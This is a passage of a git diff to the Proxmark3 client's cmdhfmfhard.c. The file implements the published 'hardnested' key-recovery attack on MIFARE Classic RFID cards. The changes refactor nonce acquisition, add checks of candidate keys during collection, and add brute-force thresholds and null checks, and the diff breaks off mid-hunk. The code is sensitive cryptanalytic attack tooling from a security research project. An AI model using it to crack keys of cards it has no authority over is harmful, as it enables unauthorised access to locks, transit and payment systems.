X-Git-Url: https://git.zerfleddert.de/cgi-bin/gitweb.cgi/proxmark3-svn/blobdiff_plain/3130ba4b2168f8e8dd66f214d1eecdca65708d53..de39bf505ab3a2f4166e858cc448e3ef45b7092f:/client/cmdhfmfhard.c?ds=sidebyside

diff --git a/client/cmdhfmfhard.c b/client/cmdhfmfhard.c
index 5b9a6494..3fed7c95 100644
--- a/client/cmdhfmfhard.c
+++ b/client/cmdhfmfhard.c
@@ -1,6 +1,7 @@
 //-----------------------------------------------------------------------------
 // Copyright (C) 2015 piwi
 // fiddled with 2016 Azcid (hardnested bitsliced Bruteforce imp)
+// fiddled with 2016 Matrix ( sub testing of nonces while collecting )
 // This code is licensed to you under the terms of the GNU GPL, version 2 or,
 // at your option, any later version. See the LICENSE.txt file for the text of
 // the license.
@@ -13,31 +14,16 @@
 //   Mifare Classic Cards" in Proceedings of the 22nd ACM SIGSAC Conference on 
 //   Computer and Communications Security, 2015
 //-----------------------------------------------------------------------------
-
-#include <stdlib.h> 
-#include <stdio.h>
-#include <string.h>
-#include <pthread.h>
-#include <locale.h>
-#include <math.h>
-#include "proxmark3.h"
-#include "cmdmain.h"
-#include "ui.h"
-#include "util.h"
-#include "nonce2key/crapto1.h"
-#include "nonce2key/crypto1_bs.h"
-#include "parity.h"
-#ifdef __WIN32
-	#include <windows.h>
-#endif
-#include <malloc.h>
-#include <assert.h>
-
-// uint32_t test_state_odd = 0;
-// uint32_t test_state_even = 0;
+#include "cmdhfmfhard.h"
+#include "cmdhw.h"
 
 #define CONFIDENCE_THRESHOLD	0.95		// Collect nonces until we are certain enough that the following brute force is successfull
-#define GOOD_BYTES_REQUIRED		28
+#define GOOD_BYTES_REQUIRED	13		// default 28, could be smaller == faster
+#define NONCES_THRESHOLD	5000		// every N nonces check if we can crack the key
+#define CRACKING_THRESHOLD	36.0f //38.50f		// as 2^38.5
+#define MAX_BUCKETS		128
+
+#define END_OF_LIST_MARKER		0xFFFFFFFF
 
 static const float p_K[257] = {		// the probability that a random nonce has a Sum Property == K 
 	0.0290, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 
@@ -73,7 +59,6 @@ static const float p_K[257] = {		// the probability that a random nonce has a Su
 	0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000,
 	0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000,
 	0.0290 };
-
 		
 typedef struct noncelistentry {
 	uint32_t nonce_enc;
@@ -89,10 +74,10 @@ typedef struct noncelist {
 	float Sum8_prob;
 	bool updated;
 	noncelistentry_t *first;
-	float score1, score2;
+	float score1;
+	uint_fast8_t score2;
 } noncelist_t;
 
-
 static size_t nonces_to_bruteforce = 0;
 static noncelistentry_t *brute_force_nonces[256];
 static uint32_t cuid = 0;
@@ -130,9 +115,28 @@ typedef struct {
 
 static partial_indexed_statelist_t partial_statelist[17];
 static partial_indexed_statelist_t statelist_bitflip;
-
 static statelist_t *candidates = NULL;
 
+bool field_off = false;
+
+uint64_t foundkey = 0;
+size_t keys_found = 0;
+size_t bucket_count = 0;
+statelist_t* buckets[MAX_BUCKETS];
+static uint64_t total_states_tested = 0;
+size_t thread_count = 4;
+
+// these bitsliced states will hold identical states in all slices
+bitslice_t bitsliced_rollback_byte[ROLLBACK_SIZE];
+
+// arrays of bitsliced states with identical values in all slices
+bitslice_t bitsliced_encrypted_nonces[NONCE_TESTS][STATE_SIZE];
+bitslice_t bitsliced_encrypted_parity_bits[NONCE_TESTS][ROLLBACK_SIZE];
+
+#define EXACT_COUNT
+
+static bool generate_candidates(uint16_t, uint16_t);
+static bool brute_force(void);
 
 static int add_nonce(uint32_t nonce_enc, uint8_t par_enc) 
 {
@@ -161,14 +165,17 @@ static int add_nonce(uint32_t nonce_enc, uint8_t par_enc)
 		} else {					// add new entry at end of existing list.
 			p2 = p2->next = malloc(sizeof(noncelistentry_t));
 		}
-	} else if ((p1->nonce_enc & 0x00ff0000) != (nonce_enc & 0x00ff0000)) {				// found distinct 2nd byte. Need to insert.
+		if (p2 == NULL) return 0;							// memory allocation failed
+	}
+	else if ((p1->nonce_enc & 0x00ff0000) != (nonce_enc & 0x00ff0000)) {			// found distinct 2nd byte. Need to insert.
 		if (p2 == NULL) {			// need to insert at start of list
 			p2 = nonces[first_byte].first = malloc(sizeof(noncelistentry_t));
 		} else {
 			p2 = p2->next = malloc(sizeof(noncelistentry_t));
 		}
-	} else {											// we have seen this 2nd byte before. Nothing to add or insert. 
-		return (0);
+		if (p2 == NULL) return 0;							// memory allocation failed
+	} else {
+		return 0;									// we have seen this 2nd byte before. Nothing to add or insert.
 	}
 
 	// add or insert new data
@@ -185,7 +192,7 @@ static int add_nonce(uint32_t nonce_enc, uint8_t par_enc)
 	nonces[first_byte].Sum += evenparity32((nonce_enc & 0x00ff0000) | (par_enc & 0x04));
 	nonces[first_byte].updated = true;   // indicates that we need to recalculate the Sum(a8) probability for this first byte
 
-	return (1);				// new nonce added
+	return 1;				// new nonce added
 }
 
 static void init_nonce_memory(void)
@@ -203,7 +210,6 @@ static void init_nonce_memory(void)
 	num_good_first_bytes = 0;
 }
 
-
 static void free_nonce_list(noncelistentry_t *p)
 {
 	if (p == NULL) {
@@ -296,17 +302,19 @@ static float sum_probability(uint16_t K, uint16_t n, uint16_t k)
 	if (k > K || p_K[K] == 0.0) return 0.0;
 
 	double p_T_is_k_when_S_is_K = p_hypergeometric(N, K, n, k);
+	if (p_T_is_k_when_S_is_K == 0.0) return 0.0;
+
 	double p_S_is_K = p_K[K];
-	double p_T_is_k = 0;
+	double p_T_is_k = 0.0;
 	for (uint16_t i = 0; i <= 256; i++) {
 		if (p_K[i] != 0.0) {
 			p_T_is_k += p_K[i] * p_hypergeometric(N, i, n, k);
 		}
 	}
+	if (p_T_is_k == 0.0) return 0.0;
 	return(p_T_is_k_when_S_is_K * p_S_is_K / p_T_is_k);
 }
 
-	
 static inline uint_fast8_t common_bits(uint_fast8_t bytes_diff) 
 {
 	static const uint_fast8_t common_bits_LUT[256] = {
@@ -448,32 +456,31 @@ static void Tests()
 	// crypto1_destroy(pcs);
 
 	
-	
 	// printf("\nTests: number of states with BitFlipProperty: %d, (= %1.3f%% of total states)\n", statelist_bitflip.len[0], 100.0 * statelist_bitflip.len[0] / (1<<20));
 
-	printf("\nTests: Actual BitFlipProperties odd/even:\n");
-	for (uint16_t i = 0; i < 256; i++) {
-		printf("[%02x]:%c  ", i, nonces[i].BitFlip[ODD_STATE]?'o':nonces[i].BitFlip[EVEN_STATE]?'e':' ');
-		if (i % 8 == 7) {
-			printf("\n");
-		}
-	}
+	// printf("\nTests: Actual BitFlipProperties odd/even:\n");
+	// for (uint16_t i = 0; i < 256; i++) {
+		// printf("[%02x]:%c  ", i, nonces[i].BitFlip[ODD_STATE]?'o':nonces[i].BitFlip[EVEN_STATE]?'e':' ');
+		// if (i % 8 == 7) {
+			// printf("\n");
+		// }
+	// }
 	
-	printf("\nTests: Sorted First Bytes:\n");
-	for (uint16_t i = 0; i < 256; i++) {
-		uint8_t best_byte = best_first_bytes[i];
-		printf("#%03d Byte: %02x, n = %3d, k = %3d, Sum(a8): %3d, Confidence: %5.1f%%, Bitflip: %c\n", 
-		//printf("#%03d Byte: %02x, n = %3d, k = %3d, Sum(a8): %3d, Confidence: %5.1f%%, Bitflip: %c, score1: %1.5f, score2: %1.0f\n", 
-			i, best_byte, 
-			nonces[best_byte].num,
-			nonces[best_byte].Sum,
-			nonces[best_byte].Sum8_guess,
-			nonces[best_byte].Sum8_prob * 100,
-			nonces[best_byte].BitFlip[ODD_STATE]?'o':nonces[best_byte].BitFlip[EVEN_STATE]?'e':' '
-			//nonces[best_byte].score1,
-			//nonces[best_byte].score2
-			);
-	}
+	// printf("\nTests: Sorted First Bytes:\n");
+	// for (uint16_t i = 0; i < 256; i++) {
+		// uint8_t best_byte = best_first_bytes[i];
+		// printf("#%03d Byte: %02x, n = %3d, k = %3d, Sum(a8): %3d, Confidence: %5.1f%%, Bitflip: %c\n", 
+		// //printf("#%03d Byte: %02x, n = %3d, k = %3d, Sum(a8): %3d, Confidence: %5.1f%%, Bitflip: %c, score1: %1.5f, score2: %1.0f\n", 
+			// i, best_byte, 
+			// nonces[best_byte].num,
+			// nonces[best_byte].Sum,
+			// nonces[best_byte].Sum8_guess,
+			// nonces[best_byte].Sum8_prob * 100,
+			// nonces[best_byte].BitFlip[ODD_STATE]?'o':nonces[best_byte].BitFlip[EVEN_STATE]?'e':' '
+			// //nonces[best_byte].score1,
+			// //nonces[best_byte].score2
+			// );
+	// }
 	
 	// printf("\nTests: parity performance\n");
 	// time_t time1p = clock();
@@ -493,7 +500,7 @@ static void Tests()
 
 }
 
-static void sort_best_first_bytes(void)
+static uint16_t sort_best_first_bytes(void)
 {
 	// sort based on probability for correct guess	
 	for (uint16_t i = 0; i < 256; i++ ) {
@@ -508,8 +515,8 @@ static void sort_best_first_bytes(void)
 				best_first_bytes[k] = best_first_bytes[k-1];
 			}
 		}
-			best_first_bytes[j] = i;
-		}
+		best_first_bytes[j] = i;
+	}
 
 	// determine how many are above the CONFIDENCE_THRESHOLD
 	uint16_t num_good_nonces = 0;
@@ -519,6 +526,8 @@ static void sort_best_first_bytes(void)
 		}
 	}
 	
+	if (num_good_nonces == 0) return 0;
+
 	uint16_t best_first_byte = 0;
 
 	// select the best possible first byte based on number of common bits with all {b'}
@@ -541,25 +550,28 @@ static void sort_best_first_bytes(void)
 	for (uint16_t i = 0; i < num_good_nonces; i++ ) {
 		uint16_t sum8 = nonces[best_first_bytes[i]].Sum8_guess;
 		float bitflip_prob = 1.0;
-		if (nonces[best_first_bytes[i]].BitFlip[ODD_STATE] || nonces[best_first_bytes[i]].BitFlip[EVEN_STATE]) {
+		
+		if (nonces[best_first_bytes[i]].BitFlip[ODD_STATE] || nonces[best_first_bytes[i]].BitFlip[EVEN_STATE])
 			bitflip_prob = 0.09375;
-		}
+		
 		nonces[best_first_bytes[i]].score1 = p_K[sum8] * bitflip_prob;
-		if (p_K[sum8] * bitflip_prob <= min_p_K) {
+		
+		if (p_K[sum8] * bitflip_prob <= min_p_K)
 			min_p_K = p_K[sum8] * bitflip_prob;
-		}
+		
 	}
 
 
 	// use number of commmon bits as a tie breaker
-	uint16_t max_common_bits = 0;
+	uint_fast8_t max_common_bits = 0;
 	for (uint16_t i = 0; i < num_good_nonces; i++) {
+
 		float bitflip_prob = 1.0;
-		if (nonces[best_first_bytes[i]].BitFlip[ODD_STATE] || nonces[best_first_bytes[i]].BitFlip[EVEN_STATE]) {
+		if (nonces[best_first_bytes[i]].BitFlip[ODD_STATE] || nonces[best_first_bytes[i]].BitFlip[EVEN_STATE])
 			bitflip_prob = 0.09375;
-		}
+		
 		if (p_K[nonces[best_first_bytes[i]].Sum8_guess] * bitflip_prob == min_p_K) {
-			uint16_t sum_common_bits = 0;
+			uint_fast8_t sum_common_bits = 0;
 			for (uint16_t j = 0; j < num_good_nonces; j++) {
 				sum_common_bits += common_bits(best_first_bytes[i] ^ best_first_bytes[j]);
 			}
@@ -572,15 +584,17 @@ static void sort_best_first_bytes(void)
 	}	
 
 	// swap best possible first byte to the pole position
-	uint16_t temp = best_first_bytes[0];
-	best_first_bytes[0] = best_first_bytes[best_first_byte];
-	best_first_bytes[best_first_byte] = temp;
+	if (best_first_byte != 0) {
+		uint16_t temp = best_first_bytes[0];
+		best_first_bytes[0] = best_first_bytes[best_first_byte];
+		best_first_bytes[best_first_byte] = temp;
+	}
 	
+	return num_good_nonces;
 }
 
 static uint16_t estimate_second_byte_sum(void) 
-{
-	
+{	
 	for (uint16_t first_byte = 0; first_byte < 256; first_byte++) {
 		float Sum8_prob = 0.0;
 		uint16_t Sum8 = 0;
@@ -597,27 +611,17 @@ static uint16_t estimate_second_byte_sum(void)
 			nonces[first_byte].updated = false;
 		}
 	}
-	
-	sort_best_first_bytes();
-
-	uint16_t num_good_nonces = 0;
-	for (uint16_t i = 0; i < 256; i++) {
-		if (nonces[best_first_bytes[i]].Sum8_prob >= CONFIDENCE_THRESHOLD) {
-			++num_good_nonces;
-		}
-	}
-	
-	return num_good_nonces;
+	return sort_best_first_bytes();
 }	
 
 static int read_nonce_file(void)
 {
 	FILE *fnonces = NULL;
-	uint8_t trgBlockNo;
-	uint8_t trgKeyType;
+	uint8_t trgBlockNo = 0;
+	uint8_t trgKeyType = 0;
 	uint8_t read_buf[9];
-	uint32_t nt_enc1, nt_enc2;
-	uint8_t par_enc;
+	uint32_t nt_enc1 = 0, nt_enc2 = 0;
+	uint8_t par_enc = 0;
 	int total_num_nonces = 0;
 	
 	if ((fnonces = fopen("nonces.bin","rb")) == NULL) { 
@@ -626,6 +630,7 @@ static int read_nonce_file(void)
 	}
 
 	PrintAndLog("Reading nonces from file nonces.bin...");
+	memset (read_buf, 0, sizeof (read_buf));
 	size_t bytes_read = fread(read_buf, 1, 6, fnonces);
 	if ( bytes_read == 0) {
 		PrintAndLog("File reading error.");
@@ -635,8 +640,10 @@ static int read_nonce_file(void)
 	cuid = bytes_to_num(read_buf, 4);
 	trgBlockNo = bytes_to_num(read_buf+4, 1);
 	trgKeyType = bytes_to_num(read_buf+5, 1);
-
-	while (fread(read_buf, 1, 9, fnonces) == 9) {
+	size_t ret = 0;
+	do {
+		memset (read_buf, 0, sizeof (read_buf));
+		if ((ret = fread(read_buf, 1, 9, fnonces)) == 9) {
 		nt_enc1 = bytes_to_num(read_buf, 4);
 		nt_enc2 = bytes_to_num(read_buf+4, 4);
 		par_enc = bytes_to_num(read_buf+8, 1);
@@ -646,16 +653,16 @@ static int read_nonce_file(void)
 		add_nonce(nt_enc2, par_enc & 0x0f);
 		total_num_nonces += 2;
 	}
+	} while (ret == 9);
+
 	fclose(fnonces);
 	PrintAndLog("Read %d nonces from file. cuid=%08x, Block=%d, Keytype=%c", total_num_nonces, cuid, trgBlockNo, trgKeyType==0?'A':'B');
-
 	return 0;
 }
 
 static void Check_for_FilterFlipProperties(void)
 {
 	printf("Checking for Filter Flip Properties...\n");
-
 	uint16_t num_bitflips = 0;
 	
 	for (uint16_t i = 0; i < 256; i++) {
@@ -664,6 +671,8 @@ static void Check_for_FilterFlipProperties(void)
 	}
 	
 	for (uint16_t i = 0; i < 256; i++) {
+		if (!nonces[i].first || !nonces[i^0x80].first || !nonces[i^0x40].first) continue;
+
 		uint8_t parity1 = (nonces[i].first->par_enc) >> 3;				// parity of first byte
 		uint8_t parity2_odd = (nonces[i^0x80].first->par_enc) >> 3;  	// XOR 0x80 = last bit flipped
 		uint8_t parity2_even = (nonces[i^0x40].first->par_enc) >> 3;	// XOR 0x40 = second last bit flipped
@@ -677,9 +686,8 @@ static void Check_for_FilterFlipProperties(void)
 		}
 	}
 	
-	if (write_stats) {
+	if (write_stats)
 		fprintf(fstats, "%d;", num_bitflips);
-	}
 }
 
 static void simulate_MFplus_RNG(uint32_t test_cuid, uint64_t test_key, uint32_t *nt_enc, uint8_t *par_enc)
@@ -736,8 +744,8 @@ static void simulate_acquire_nonces()
 			num_good_first_bytes = estimate_second_byte_sum();
 			if (total_num_nonces > next_fivehundred) {
 				next_fivehundred = (total_num_nonces/500+1) * 500;
-				printf("Acquired %5d nonces (%5d with distinct bytes 0 and 1). Number of bytes with probability for correctly guessed Sum(a8) > %1.1f%%: %d\n",
-					total_num_nonces, 
+				printf("Acquired %5d nonces (%5d with distinct bytes 0,1). Bytes with probability for correctly guessed Sum(a8) > %1.1f%%: %d\n",
+					total_num_nonces,
 					total_added_nonces,
 					CONFIDENCE_THRESHOLD * 100.0,
 					num_good_first_bytes);
@@ -761,7 +769,6 @@ static int acquire_nonces(uint8_t blockNo, uint8_t keyType, uint8_t *key, uint8_
 {
 	clock_t time1 = clock();
 	bool initialize = true;
-	bool field_off = false;
 	bool finished = false;
 	bool filter_flip_checked = false;
 	uint32_t flags = 0;
@@ -769,116 +776,124 @@ static int acquire_nonces(uint8_t blockNo, uint8_t keyType, uint8_t *key, uint8_
 	uint32_t total_num_nonces = 0;
 	uint32_t next_fivehundred = 500;
 	uint32_t total_added_nonces = 0;
+	uint32_t idx = 1;
+	uint32_t timeout  = 0;
 	FILE *fnonces = NULL;
+	field_off = false;
 	UsbCommand resp;
-
+	UsbCommand c = {CMD_MIFARE_ACQUIRE_ENCRYPTED_NONCES, {0,0,0} };
+	memcpy(c.d.asBytes, key, 6);	
+	c.arg[0] = blockNo + (keyType * 0x100);
+	c.arg[1] = trgBlockNo + (trgKeyType * 0x100);
+		
 	printf("Acquiring nonces...\n");
-	
-	clearCommandBuffer();
-
 	do {
+	
 		flags = 0;
 		flags |= initialize ? 0x0001 : 0;
 		flags |= slow ? 0x0002 : 0;
 		flags |= field_off ? 0x0004 : 0;
-		UsbCommand c = {CMD_MIFARE_ACQUIRE_ENCRYPTED_NONCES, {blockNo + keyType * 0x100, trgBlockNo + trgKeyType * 0x100, flags}};
-		memcpy(c.d.asBytes, key, 6);
+		c.arg[2] = flags;
 
+		clearCommandBuffer();
 		SendCommand(&c);
 		
-		if (field_off) finished = true;
-		
-		if (initialize) {
-			if (!WaitForResponseTimeout(CMD_ACK, &resp, 3000)) return 1;
-			if (resp.arg[0]) return resp.arg[0];  // error during nested_hard
+		if (field_off) break;
+
+		while(!WaitForResponseTimeout(CMD_ACK, &resp, 2000)) {
+			timeout++;
+			printf(".");
+			if (timeout > 3) {
+				PrintAndLog("\nNo response from Proxmark. Aborting...");
+				if (fnonces) fclose(fnonces);
+				return 1;
+			}
+		}		
 
+		if (resp.arg[0]) {
+			if (fnonces) fclose(fnonces);
+			return resp.arg[0];  // error during nested_hard
+		}
+			
+		if (initialize) {
+			// global var CUID
 			cuid = resp.arg[1];
-			// PrintAndLog("Acquiring nonces for CUID 0x%08x", cuid); 
 			if (nonce_file_write && fnonces == NULL) {
 				if ((fnonces = fopen("nonces.bin","wb")) == NULL) { 
 					PrintAndLog("Could not create file nonces.bin");
 					return 3;
 				}
 				PrintAndLog("Writing acquired nonces to binary file nonces.bin");
+				memset (write_buf, 0, sizeof (write_buf));
 				num_to_bytes(cuid, 4, write_buf);
 				fwrite(write_buf, 1, 4, fnonces);
 				fwrite(&trgBlockNo, 1, 1, fnonces);
 				fwrite(&trgKeyType, 1, 1, fnonces);
+				fflush(fnonces);
 			}
+			initialize = false;			
 		}
-
-		if (!initialize) {
-			uint32_t nt_enc1, nt_enc2;
-			uint8_t par_enc;
-			uint16_t num_acquired_nonces = resp.arg[2];
-			uint8_t *bufp = resp.d.asBytes;
-			for (uint16_t i = 0; i < num_acquired_nonces; i+=2) {
-				nt_enc1 = bytes_to_num(bufp, 4);
-				nt_enc2 = bytes_to_num(bufp+4, 4);
-				par_enc = bytes_to_num(bufp+8, 1);
-				
-				//printf("Encrypted nonce: %08x, encrypted_parity: %02x\n", nt_enc1, par_enc >> 4);
-				total_added_nonces += add_nonce(nt_enc1, par_enc >> 4);
-				//printf("Encrypted nonce: %08x, encrypted_parity: %02x\n", nt_enc2, par_enc & 0x0f);
-				total_added_nonces += add_nonce(nt_enc2, par_enc & 0x0f);
-				
-
-				if (nonce_file_write) {
-					fwrite(bufp, 1, 9, fnonces);
-				}
-				
-				bufp += 9;
+		
+		uint32_t nt_enc1, nt_enc2;
+		uint8_t par_enc;
+		uint16_t num_acquired_nonces = resp.arg[2];
+		uint8_t *bufp = resp.d.asBytes;
+		for (uint16_t i = 0; i < num_acquired_nonces; i += 2) {
+			nt_enc1 = bytes_to_num(bufp, 4);
+			nt_enc2 = bytes_to_num(bufp+4, 4);
+			par_enc = bytes_to_num(bufp+8, 1);
+			
+			total_added_nonces += add_nonce(nt_enc1, par_enc >> 4);
+			total_added_nonces += add_nonce(nt_enc2, par_enc & 0x0f);
+			
+			if (nonce_file_write && fnonces) {
+				fwrite(bufp, 1, 9, fnonces);
+				fflush(fnonces);
 			}
-
-			total_num_nonces += num_acquired_nonces;
+			bufp += 9;
 		}
-		
-		if (first_byte_num == 256 ) {
-			// printf("first_byte_num = %d, first_byte_Sum = %d\n", first_byte_num, first_byte_Sum);
+		total_num_nonces += num_acquired_nonces;
+
+		if (first_byte_num == 256) {
+
 			if (!filter_flip_checked) {
 				Check_for_FilterFlipProperties();
 				filter_flip_checked = true;
 			}
+
 			num_good_first_bytes = estimate_second_byte_sum();
+
 			if (total_num_nonces > next_fivehundred) {
 				next_fivehundred = (total_num_nonces/500+1) * 500;
-				printf("Acquired %5d nonces (%5d with distinct bytes 0 and 1). Number of bytes with probability for correctly guessed Sum(a8) > %1.1f%%: %d\n",
-					total_num_nonces, 
+				printf("Acquired %5d nonces (%5d/%5d with distinct bytes 0,1). Bytes with probability for correctly guessed Sum(a8) > %1.1f%%: %d\n",
+					total_num_nonces,
 					total_added_nonces,
+					NONCES_THRESHOLD * idx,
 					CONFIDENCE_THRESHOLD * 100.0,
-					num_good_first_bytes);
-			}
-			if (num_good_first_bytes >= GOOD_BYTES_REQUIRED) {
-				field_off = true;	// switch off field with next SendCommand and then finish
+					num_good_first_bytes
+					);				
 			}
-		}
-
-		if (!initialize) {
-			if (!WaitForResponseTimeout(CMD_ACK, &resp, 3000)) {
-				fclose(fnonces);
-				return 1;
-			}
-			if (resp.arg[0]) {
-				fclose(fnonces);
-				return resp.arg[0];  // error during nested_hard
+			
+			if (total_added_nonces >= (NONCES_THRESHOLD * idx)) {
+				if (num_good_first_bytes > 0) {
+					if (generate_candidates(first_byte_Sum, nonces[best_first_bytes[0]].Sum8_guess) || known_target_key != -1) {
+						field_off = brute_force(); // switch off field with next SendCommand and then finish
+					}
+				}
+				idx++;
 			}
 		}
-
-		initialize = false;
-
 	} while (!finished);
 
-	
-	if (nonce_file_write) {
+	if (nonce_file_write && fnonces)
 		fclose(fnonces);
-	}
 	
 	time1 = clock() - time1;
 	if ( time1 > 0 ) {
-	PrintAndLog("Acquired a total of %d nonces in %1.1f seconds (%0.0f nonces/minute)", 
-		total_num_nonces, 
-		((float)time1)/CLOCKS_PER_SEC, 
-		total_num_nonces * 60.0 * CLOCKS_PER_SEC/(float)time1
+		PrintAndLog("Acquired a total of %d nonces in %1.1f seconds (%0.0f nonces/minute)", 
+			total_num_nonces, 
+			((float)time1)/CLOCKS_PER_SEC, 
+			total_num_nonces * 60.0 * CLOCKS_PER_SEC/(float)time1
 		);
 	}
 	return 0;
@@ -887,7 +902,8 @@ static int acquire_nonces(uint8_t blockNo, uint8_t keyType, uint8_t *key, uint8_
 static int init_partial_statelists(void)
 {
 	const uint32_t sizes_odd[17] = { 126757, 0, 18387, 0, 74241, 0, 181737, 0, 248801, 0, 182033, 0, 73421, 0, 17607, 0, 125601 };
-	const uint32_t sizes_even[17] = { 125723, 0, 17867, 0, 74305, 0, 178707, 0, 248801, 0, 185063, 0, 73356, 0, 18127, 0, 126634 };
+//	const uint32_t sizes_even[17] = { 125723, 0, 17867, 0, 74305, 0, 178707, 0, 248801, 0, 185063, 0, 73356, 0, 18127, 0, 126634 };
+	const uint32_t sizes_even[17] = { 125723, 0, 17867, 0, 74305, 0, 178707, 0, 248801, 0, 185063, 0, 73357, 0, 18127, 0, 126635 };
 	
 	printf("Allocating memory for partial statelists...\n");
 	for (odd_even_t odd_even = EVEN_STATE; odd_even <= ODD_STATE; odd_even++) {
@@ -927,7 +943,7 @@ static int init_partial_statelists(void)
 		for (uint16_t i = 0; i <= 16; i += 2) {
 			uint32_t *p = partial_statelist[i].states[odd_even];
 			p += partial_statelist[i].len[odd_even];
-			*p = 0xffffffff;
+			*p = END_OF_LIST_MARKER;
 		}
 	}
 	
@@ -953,8 +969,8 @@ static void init_BitFlip_statelist(void)
 	}
 	// set len and add End Of List marker
 	statelist_bitflip.len[0] = p - statelist_bitflip.states[0];
-	*p = 0xffffffff;
-	statelist_bitflip.states[0] = realloc(statelist_bitflip.states[0], sizeof(uint32_t) * (statelist_bitflip.len[0] + 1));
+	*p = END_OF_LIST_MARKER;
+	//statelist_bitflip.states[0] = realloc(statelist_bitflip.states[0], sizeof(uint32_t) * (statelist_bitflip.len[0] + 1));
 }
 		
 static inline uint32_t *find_first_state(uint32_t state, uint32_t mask, partial_indexed_statelist_t *sl, odd_even_t odd_even)
@@ -963,7 +979,7 @@ static inline uint32_t *find_first_state(uint32_t state, uint32_t mask, partial_
 
 	if (p == NULL) return NULL;
 	while (*p < (state & mask)) p++;
-	if (*p == 0xffffffff) return NULL;					// reached end of list, no match
+	if (*p == END_OF_LIST_MARKER) return NULL;					// reached end of list, no match
 	if ((*p & mask) == (state & mask)) return p;		// found a match.
 	return NULL;										// no match
 } 
@@ -1041,7 +1057,7 @@ static bool all_other_first_bytes_match(uint32_t state, odd_even_t odd_even)
 					uint16_t part_sum_a8 = (odd_even == ODD_STATE) ? r : s;
 					uint32_t *p = find_first_state(state, mask, &partial_statelist[part_sum_a8], odd_even);
 					if (p != NULL) {
-						while ((state & mask) == (*p & mask) && (*p != 0xffffffff)) {
+						while ((state & mask) == (*p & mask) && (*p != END_OF_LIST_MARKER)) {
 							if (remaining_bits_match(j, bytes_diff, state, (state&0x00fffff0) | *p, odd_even)) {
 								found_match = true;
 								// if ((odd_even == ODD_STATE && state == test_state_odd)
@@ -1099,7 +1115,7 @@ static bool all_bit_flips_match(uint32_t state, odd_even_t odd_even)
 			bool found_match = false;
 			uint32_t *p = find_first_state(state, mask, &statelist_bitflip, 0);
 			if (p != NULL) {
-				while ((state & mask) == (*p & mask) && (*p != 0xffffffff)) {
+				while ((state & mask) == (*p & mask) && (*p != END_OF_LIST_MARKER)) {
 					if (remaining_bits_match(j, bytes_diff, state, (state&0x00fffff0) | *p, odd_even)) {
 						found_match = true;
 						// if ((odd_even == ODD_STATE && state == test_state_odd)
@@ -1172,11 +1188,11 @@ static int add_matching_states(statelist_t *candidates, uint16_t part_sum_a0, ui
 		return 4;
 	}
 	uint32_t *add_p = candidates->states[odd_even]; 
-	for (uint32_t *p1 = partial_statelist[part_sum_a0].states[odd_even]; *p1 != 0xffffffff; p1++) {
+	for (uint32_t *p1 = partial_statelist[part_sum_a0].states[odd_even]; *p1 != END_OF_LIST_MARKER; p1++) {
 		uint32_t search_mask = 0x000ffff0;
 		uint32_t *p2 = find_first_state((*p1 << 4), search_mask, &partial_statelist[part_sum_a8], odd_even);
-		if (p2 != NULL) {
-			while (((*p1 << 4) & search_mask) == (*p2 & search_mask) && *p2 != 0xffffffff) {
+		if (p1 != NULL && p2 != NULL) {
+			while (((*p1 << 4) & search_mask) == (*p2 & search_mask) && *p2 != END_OF_LIST_MARKER) {
 				if ((nonces[best_first_bytes[0]].BitFlip[odd_even] && find_first_state((*p1 << 4) | *p2, 0x000fffff, &statelist_bitflip, 0))
 					|| !nonces[best_first_bytes[0]].BitFlip[odd_even]) {
 				if (all_other_first_bytes_match((*p1 << 4) | *p2, odd_even)) {
@@ -1191,7 +1207,7 @@ static int add_matching_states(statelist_t *candidates, uint16_t part_sum_a0, ui
 	}
 
 	// set end of list marker and len
-	*add_p = 0xffffffff; 
+	*add_p = END_OF_LIST_MARKER; 
 	candidates->len[odd_even] = add_p - candidates->states[odd_even];
 
 	candidates->states[odd_even] = realloc(candidates->states[odd_even], sizeof(uint32_t) * (candidates->len[odd_even] + 1));
@@ -1213,6 +1229,8 @@ static statelist_t *add_more_candidates(statelist_t *current_candidates)
 	} else {
 		new_candidates = current_candidates->next = (statelist_t *)malloc(sizeof(statelist_t));
 	}
+	if (!new_candidates) return NULL;
+
 	new_candidates->next = NULL;
 	new_candidates->len[ODD_STATE] = 0;
 	new_candidates->len[EVEN_STATE] = 0;
@@ -1221,7 +1239,7 @@ static statelist_t *add_more_candidates(statelist_t *current_candidates)
 	return new_candidates;
 }
 
-static void TestIfKeyExists(uint64_t key)
+static bool TestIfKeyExists(uint64_t key)
 {
 	struct Crypto1State *pcs;
 	pcs = crypto1_create(key);
@@ -1230,48 +1248,53 @@ static void TestIfKeyExists(uint64_t key)
 	uint32_t state_odd = pcs->odd & 0x00ffffff;
 	uint32_t state_even = pcs->even & 0x00ffffff;
 	//printf("Tests: searching for key %llx after first byte 0x%02x (state_odd = 0x%06x, state_even = 0x%06x) ...\n", key, best_first_bytes[0], state_odd, state_even);
-	
+	printf("Validating key search space\n");
 	uint64_t count = 0;
 	for (statelist_t *p = candidates; p != NULL; p = p->next) {
 		bool found_odd = false;
 		bool found_even = false;
 		uint32_t *p_odd = p->states[ODD_STATE];
 		uint32_t *p_even = p->states[EVEN_STATE];
-		while (*p_odd != 0xffffffff) {
+		while (*p_odd != END_OF_LIST_MARKER) {
 			if ((*p_odd & 0x00ffffff) == state_odd) {
 				found_odd = true;
 				break;
 			}
 			p_odd++;
 		}
-		while (*p_even != 0xffffffff) {
-			if ((*p_even & 0x00ffffff) == state_even) {
+		while (*p_even != END_OF_LIST_MARKER) {
+			if ((*p_even & 0x00ffffff) == state_even)
 				found_even = true;
-			}
+
 			p_even++;
 		}
 		count += (p_odd - p->states[ODD_STATE]) * (p_even - p->states[EVEN_STATE]);
 		if (found_odd && found_even) {
-			PrintAndLog("Key Found after testing %lld (2^%1.1f) out of %lld (2^%1.1f) keys. A brute force would have taken approx %lld minutes.", 
-				count, log(count)/log(2), 
-				maximum_states, log(maximum_states)/log(2),
-				(count>>23)/60);
-			if (write_stats) {
-				fprintf(fstats, "1\n");
+			if (known_target_key != -1) {
+				PrintAndLog("Key Found after testing %llu (2^%1.1f) out of %lld (2^%1.1f) keys.", 
+					count,
+					log(count)/log(2), 
+					maximum_states,
+					log(maximum_states)/log(2)
+					);
+				if (write_stats)
+					fprintf(fstats, "1\n");			
 			}
 			crypto1_destroy(pcs);
-			return;
+			return true;
 		}
 	}
 
